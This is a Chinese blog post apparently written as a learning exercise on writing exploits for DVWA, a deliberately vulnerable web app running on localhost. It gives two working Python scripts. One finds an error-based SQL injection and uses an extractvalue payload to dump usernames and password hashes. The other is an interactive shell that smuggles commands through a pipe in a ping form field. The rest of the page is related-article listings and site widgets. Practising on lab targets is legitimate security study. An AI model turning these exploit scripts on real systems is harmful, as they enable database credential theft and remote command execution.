dvwa学习编写exp

最新推荐文章于 2024-03-21 18:08:12 发布
最新推荐文章于 2024-03-21 18:08:12 发布
阅读量276 收藏
点赞数
分类专栏: 渗透测试工具 文章标签: python 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/115557847
版权

sql注入报错exp

import requests
import re

//cookie验证登录
cookies = {"PHPSESSID":'jjfrgqtge5n0a03ge127ti8ttk','security':'low'}
//可能存在sql注入地址
url = "http://127.0.0.1/vulnerabilities/sqli/?Submit=Submit%23&id=1"
//index()函数用于从列表中找出某个值第一个匹配项的索引位置
//split()通过指定分隔符对字符串进行切片
parms = url[url.index("?")+ 1:].split("&")

def checksql():
    for parm in parms:
    	//拼接加入单引号判断是否存在SQL syntax报错
       sqlurl = url.replace(parm, parm + "'")
       req = requests.get(sqlurl, cookies=cookies)
       if 'SQL syntax' in req.text:
           print("存在sql注入")	
           print("[+]SQL注入点是:%s[+]" % parm)
           return True

def getStr(res,sql):
	//执行payload通过正则拿出来给html,返回html的内容
   payload = url + "'and(extractvalue(1,concat(0x7e,(select {} from users limit 1),0x7e)))%23".format(sql)
   req = requests.get(url=payload,cookies=cookies)
   html = re.search(res,req.text).group(1)
   return html

def exploit():
	//要执行的语句传入getStr,返回pwd1和pwd2
   strlen=getStr("~(\d+)~","length(concat(user,password))")
   pwd1 = getStr("~(.*)'","substring(concat(user,password),1,32)")
   pwd2 = getStr("~(.*)~","substring(concat(user,password),32,%s)"% strlen)
   return "[+]账号 and 密码:"+pwd1+pwd2

if checksql()==True:
   print(exploit())

命令执行

import requests
import base64

cookies = {"PHPSESSID":'jjfrgqtge5n0a03ge127ti8ttk','security':'low'}
url = "http://127.0.0.1/vulnerabilities/exec/"

while True:
        cmdline = base64.b64encode(input('请输入你的命令<<<').encode("utf-8"))
        data = {'ip':'127.0.0.1|'+str(base64.b64decode(cmdline),"utf-8"),'Submit':'Submit'}
        req = requests.post(url=url,data=data,cookies=cookies)
        getdata = req.text[req.text.index('<pre>')+5:req.text.index('</pre>')]
        if getdata == '':
            print("命令错误")
        else:
            print(getdata)
p_utao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DVWA学习笔记全等级
06-08
DVWA学习笔记全等级
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
针对DVWA-sql注入写的exp
MzHeader的博客
03-24 560
SQL Injection(sql注入) 介绍 SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入思路 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面简要介绍手...
exp编写
最新发布
qq_74378387的博客
03-21 330
在https://www.exploit-db.com/ 漏洞库里面 每天都可以很多新的漏洞发布。可是新的漏洞很多漏洞发布者 ,都是只给代码漏洞部分,更多的是没有详细的分析。更别说是漏洞利用程序了。掌握漏洞编写的技能,随心所欲地编写漏洞利用程序,不仅能简化测试过程,而且可以让漏洞程序多种多样满足我们的需要。一般的们多数接触的是WEB安全漏洞 (Web Application Exploits)这类较多。一般只需理解和掌握http协议即可。简单的html基础也可以编写EXP了。
exp编写笔记
qq_42863961的博客
08-19 334
能帮到你的话,就给个赞吧 ???? python2 -c “print ‘A’*44 + ‘\x59\x86\x04\x08’” | ./ret2win32:python2 -c 是执行代码。| :管道
POC-EXP编写
weixin_44110913的博客
08-18 3097
文章目录POC一.概念二.思维图解三.代码演示EXP一.概念二.思维图解三.代码演示 POC 一.概念 漏洞刚被批漏之后,有时候现有的工具里面是没有相应的poc的,那我们可以根据原理写出对应的poc代码,验证漏洞是否存在。 作用:用于漏洞验证,更加高效的快速挖掘漏洞,而不是手工测试,节省时间。 二.思维图解 深入了解漏洞原理 拼接payload到url中或者header头和cookies中(大多数情况都这样) 发起请求 通过响应头判断中间件和脚本版本 根据其漏洞特征,判断该漏洞是否存在 三.代码演示
exp缩写篇需要验证的exp编写
yyj1781572的博客
10-31 281
有些都是使用payload直接访问攻击页面,而且不需要权限认证,能直接使用exp实现攻击。 如果需要登录认证 如登录后方可访问漏洞页面,像这种需要权限认证的漏洞页面,在平时测试也是非常的多,这篇就是讲exp如何编写
DVWA靶场 渗透学习专用
09-07
DVWA靶场 渗透学习专用】 DVWA(Damn Vulnerable Web Application)是一个非常流行的在线安全学习平台,专门设计用于网络安全专业人士进行渗透测试和Web应用安全的学习。这个靶场包含了各种常见Web应用漏洞,如...
DVWA靶场搭建与使用
09-02
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的模拟场景,包括SQL注入、跨站...
DVWA-master.zip
01-04
DVWA渗透测试与网络安全学习平台》 DVWA(Damn Vulnerable Web Application)是一个用于安全测试和教育目的的开源Web应用程序。它旨在帮助安全专业人员、开发人员和学生了解常见Web应用程序漏洞,并提供实践...
2013phpweb漏洞利用EXP
03-28
2013phpweb漏洞利用EXP
DVWA Installation
08-15
**DVWA(Damn Vulnerable Web Application)安装指南** Damn Vulnerable Web Application,简称DVWA,是...请注意,DVWA仅用于学习和测试目的,不应在生产环境中使用。在实际操作时,务必遵守道德黑客原则和法律法规。
DVWA-master安装包
02-28
同时,通过修复这些漏洞,你可以学习如何编写更安全的代码,提高Web应用的安全性。 学习过程中,你还可以利用一些辅助工具,如Burp Suite进行代理抓包分析,或者使用OWASP ZAP自动化扫描漏洞。结合这些工具,你将...
DVWA-master.7z 压缩包
09-14
学习和利用DVWA可以帮助你理解这些漏洞的工作原理,提升你的安全意识和防御能力。同时,也可以用于测试和验证安全工具的有效性。在实际操作中,请确保遵循合法的测试准则,避免对他人系统造成损害。
简单的poc以及exp编写(入门篇)
热门推荐
LINGOVO的博客
12-18 1万+
本文中主要针对的是Web应用渗透中的漏洞,而与Web应用之间的交互大多是基于HTTP协议的。所以用到python中与HTTP协议相关的一些模块 一、何为POCEXP POC Proof of Concept中文意思是“观点证明”,是用来检测是否存在漏洞的脚本 EXP Exploit的中文意思是“漏洞利用”,是用来利用该漏洞的脚本 二、基础环境Python3 HTTP 方法 内容 GET 获取资源 POST 传输实体主体 PUT 传输文件 HEAD 获得响应报文首部
python学习之ecshop exp编写
cxk
06-04 498
python学习之ecshop exp编写 针对ecshop 2.x,漏洞分析请查看网上分析,不再赘述。 # -*- coding:utf-8 -*- import requests import time def ecshop(url): time.sleep(5) url_exp=url+"/user.php" a = "554fcae493e564ee0dc7...
SQL注入到EXP编写
weixin_30448603的博客
04-20 572
0x00 盲注简介: 顾名思义,像盲人一样注入(什么鬼解释…),通俗来说,当我们发现有SQL注入时,确不能得到SQL查询的数据回显,除了之前的写文件方式,还有就是盲注了,盲注就是通过服务器返回的状态等各种因素来猜测,最终组合得到哦我们想要的数据。 0x01 盲注必须知识: SQL盲注中常用的几个内置函数,了解一下 length(str):返回str字符串的长度。 substr(str...
渗透测试_需要验证的EXP编写
weixin_54227009的博客
05-18 311
记一次笔记 fsockopen — 打开一个网络连接或者一个Unix套接字连接 参数:hostname:网址 port:端口 errstr:错误返回信息 timeout:超时时间 靶机登录界面 登录成功界面 如果不登录直接访问main.php的话,是有账号密码验证的,是进不去的 因为界面有session 进行验证 h4pb2rtsfrsihh8h629emrm9s4 所以抓包直接把session放进去试试 这里...
DVWA渗透演练系统入门指南
"Web安全之DVWA入门,适合小白学习渗透测试入门书籍,详细介绍了DVWA这个渗透演练系统,以及Web安全基础知识和OWASP Top 10漏洞" 本资源是一本针对Web安全入门的电子书,特别关注DVWA(Damn Vulnerable Web ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值